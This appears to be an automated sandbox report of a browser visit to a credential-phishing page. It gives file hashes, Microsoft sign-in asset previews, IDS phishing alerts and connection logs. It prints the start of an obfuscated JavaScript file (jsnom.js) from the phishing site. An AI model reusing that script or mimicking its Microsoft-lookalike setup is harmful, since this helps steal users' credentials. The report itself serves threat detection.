                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:SVG Scalable Vector Graphics image
                                          Category:downloaded
                                          Size (bytes):1636
                                          Entropy (8bit):4.214613323368661
                                          Encrypted:false
                                          SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                          MD5:F7AB697E65B83CE9870A4736085DEEEC
                                          SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                          SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                          SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                          Malicious:false
                                          Reputation:low
                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 2 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 8 bits/pixel
                                          Category:downloaded
                                          Size (bytes):2780
                                          Entropy (8bit):7.874815749952653
                                          Encrypted:false
                                          SSDEEP:48:9MNqc41N/NGpVEmmNVKWqvFJ5ATJ0WDzfsbjlDSxW//WsABw2Zqqfv:9U41JN+WmmNVCQVoQxWneqY
                                          MD5:DABE9CE5581670F84E89A789A78D09B8
                                          SHA1:1662F23FF5553364505A29CAC571102CF370FC85
                                          SHA-256:04EC9BA779BE752A6480758574FEAE350370480887BC7FE52FD968519CF27208
                                          SHA-512:F09A24E952AF31C69C0B1F2EFEA433F442B2ED79D6CAF80864A0FC1C1030807F39FE7201B9EB597D1645C5BA5614B9ECA98D171EDDC794BD7311B252A84FB1F4
                                          Malicious:false
                                          Reputation:low
                                          URL:https://thewesteffect.com/favicon.ico
                                          Preview:..................&... ...............PNG........IHDR................a...rIDAT8.e.Yh\e.....wr..;..e&.t.L.&.4micR.4.I.....IE.>.$E.........."....`Q.vyH*.4.M.,6.Lf2..;w..........s.......Cr[...T.....,3A..>..B.=..-...z..1..zl..qI.t.f.>..A.J@..;.?...<....k...Tt.my..R.4*.,....G.!....<.{&BA..#...P&..8vw.P$..p&...{..m...... T.......!Ojy.......sP...%.T.G.V.7.... ...c......y......s..].^...%......|.KE.b..r=..W..T.p.....f...@...#]M..*:N...m....g...47..}7....0..c/.l.~...omAg....p.X.Qk[.....]...2.}1..=.q.w.....F.A...F/.....m....5f!...[..yG.gqc..._.a&....@.*....d\C..0...%..B..B.s.....$..n.Q._.. ^.x..^..Y8(..G.M..Y.?4<..g.*i46.w..L....K....\s.....H.fX(t .<.D...6... ......<.uU....n.'..z......[O....(5..ta;....(.P,..r....s..o.%`...Gnn9..._)...o.W.......V.....X-3.......I...Kh.-.O'...D.%..9...HKw..m.rT...D_.....z..P.2P...QLL&... ..Cp%.\xC........Ve...fD.I.Z..n......(`Q.e........B...1(.....A....[T}.....\Zw...5s0]1...Y.K..24!m.VY/..8.7&c....x....IEND.B`..PNG........IHDR... ...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 2 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 8 bits/pixel
                                          Category:dropped
                                          Size (bytes):2780
                                          Entropy (8bit):7.874815749952653
                                          Encrypted:false
                                          SSDEEP:48:9MNqc41N/NGpVEmmNVKWqvFJ5ATJ0WDzfsbjlDSxW//WsABw2Zqqfv:9U41JN+WmmNVCQVoQxWneqY
                                          MD5:DABE9CE5581670F84E89A789A78D09B8
                                          SHA1:1662F23FF5553364505A29CAC571102CF370FC85
                                          SHA-256:04EC9BA779BE752A6480758574FEAE350370480887BC7FE52FD968519CF27208
                                          SHA-512:F09A24E952AF31C69C0B1F2EFEA433F442B2ED79D6CAF80864A0FC1C1030807F39FE7201B9EB597D1645C5BA5614B9ECA98D171EDDC794BD7311B252A84FB1F4
                                          Malicious:false
                                          Reputation:low
                                          Preview:..................&... ...............PNG........IHDR................a...rIDAT8.e.Yh\e.....wr..;..e&.t.L.&.4micR.4.I.....IE.>.$E.........."....`Q.vyH*.4.M.,6.Lf2..;w..........s.......Cr[...T.....,3A..>..B.=..-...z..1..zl..qI.t.f.>..A.J@..;.?...<....k...Tt.my..R.4*.,....G.!....<.{&BA..#...P&..8vw.P$..p&...{..m...... T.......!Ojy.......sP...%.T.G.V.7.... ...c......y......s..].^...%......|.KE.b..r=..W..T.p.....f...@...#]M..*:N...m....g...47..}7....0..c/.l.~...omAg....p.X.Qk[.....]...2.}1..=.q.w.....F.A...F/.....m....5f!...[..yG.gqc..._.a&....@.*....d\C..0...%..B..B.s.....$..n.Q._.. ^.x..^..Y8(..G.M..Y.?4<..g.*i46.w..L....K....\s.....H.fX(t .<.D...6... ......<.uU....n.'..z......[O....(5..ta;....(.P,..r....s..o.%`...Gnn9..._)...o.W.......V.....X-3.......I...Kh.-.O'...D.%..9...HKw..m.rT...D_.....z..P.2P...QLL&... ..Cp%.\xC........Ve...fD.I.Z..n......(`Q.e........B...1(.....A....[T}.....\Zw...5s0]1...Y.K..24!m.VY/..8.7&c....x....IEND.B`..PNG........IHDR... ...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):2228
                                          Entropy (8bit):7.82817506159911
                                          Encrypted:false
                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                          Category:dropped
                                          Size (bytes):100217
                                          Entropy (8bit):4.51688839918228
                                          Encrypted:false
                                          SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAF:ix2wtA4+eS6e6+XE3TLJCLIlAF
                                          MD5:69858F1D6AA467818FEE39E46BFAADDB
                                          SHA1:7CE20EEC85C8DE3644C0367CDFCE8972BFE3C25B
                                          SHA-256:31F0972C467CB759E8A0C3790AF92329D9AB6F940DFA8D43AA02A609D2B5C09B
                                          SHA-512:101C431D95D136A1AE598660DFE4C3812DE06DD1F9D4280EC80D0A9CE5E4FF1D30F07827B91DFCE78100784C34F0AAF2F58E921304E9DB034516AD97A31AA849
                                          Malicious:false
                                          Reputation:low
                                          Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):52
                                          Entropy (8bit):4.190260390968384
                                          Encrypted:false
                                          SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                          MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                          SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                          SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                          SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                          Malicious:false
                                          Reputation:low
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQkx-8FXO930ihIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                          Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                          Category:downloaded
                                          Size (bytes):673
                                          Entropy (8bit):7.6596900876595075
                                          Encrypted:false
                                          SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                          MD5:0E176276362B94279A4492511BFCBD98
                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                          Malicious:false
                                          Reputation:low
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                          Category:downloaded
                                          Size (bytes):100217
                                          Entropy (8bit):4.51688839918228
                                          Encrypted:false
                                          SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAF:ix2wtA4+eS6e6+XE3TLJCLIlAF
                                          MD5:69858F1D6AA467818FEE39E46BFAADDB
                                          SHA1:7CE20EEC85C8DE3644C0367CDFCE8972BFE3C25B
                                          SHA-256:31F0972C467CB759E8A0C3790AF92329D9AB6F940DFA8D43AA02A609D2B5C09B
                                          SHA-512:101C431D95D136A1AE598660DFE4C3812DE06DD1F9D4280EC80D0A9CE5E4FF1D30F07827B91DFCE78100784C34F0AAF2F58E921304E9DB034516AD97A31AA849
                                          Malicious:false
                                          Reputation:low
                                          URL:https://thewesteffect.com/n/jsnom.js
                                          Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text
                                          Category:downloaded
                                          Size (bytes):23427
                                          Entropy (8bit):5.112735417225198
                                          Encrypted:false
                                          SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                          MD5:BA0537E9574725096AF97C27D7E54F76
                                          SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                          SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                          SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.w3schools.com/w3css/4/w3.css
                                          Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                          Category:downloaded
                                          Size (bytes):199
                                          Entropy (8bit):6.766983163126765
                                          Encrypted:false
                                          SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                          MD5:21B761F2B1FD37F587D7222023B09276
                                          SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                          SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                          SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                          Malicious:false
                                          Reputation:low
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                          Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                          Category:downloaded
                                          Size (bytes):2407
                                          Entropy (8bit):7.900400471609788
                                          Encrypted:false
                                          SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                          MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                          SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                          SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                          SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                          Malicious:false
                                          Reputation:low
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                          Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                          Category:dropped
                                          Size (bytes):673
                                          Entropy (8bit):7.6596900876595075
                                          Encrypted:false
                                          SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                          MD5:0E176276362B94279A4492511BFCBD98
                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                          Category:downloaded
                                          Size (bytes):276
                                          Entropy (8bit):7.316609873335077
                                          Encrypted:false
                                          SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                          MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                          SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                          SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                          SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                          Malicious:false
                                          Reputation:low
                                          URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                          Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                          Category:downloaded
                                          Size (bytes):1435
                                          Entropy (8bit):7.8613342322590265
                                          Encrypted:false
                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                          Malicious:false
                                          Reputation:low
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                          No static file info
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-18T23:43:53.643108+01002057333ET PHISHING MAMBA Credential Phish Landing Page 2024-11-081192.168.2.449735192.254.232.133443TCP
                                          2024-11-18T23:43:53.720968+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.449736192.254.232.133443TCP
                                          2024-11-18T23:43:54.882524+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449739192.254.232.133443TCP
                                          2024-11-18T23:43:56.357801+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449743192.254.232.133443TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 18, 2024 23:43:50.400525093 CET49675443192.168.2.4173.222.162.32
                                          Nov 18, 2024 23:43:52.383069038 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:52.383147001 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:52.383255005 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:52.383584976 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:52.383621931 CET44349736192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:52.383770943 CET49736443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:52.383909941 CET49735443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:52.383929014 CET44349735192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:52.384191990 CET49736443192.168.2.4192.254.232.133
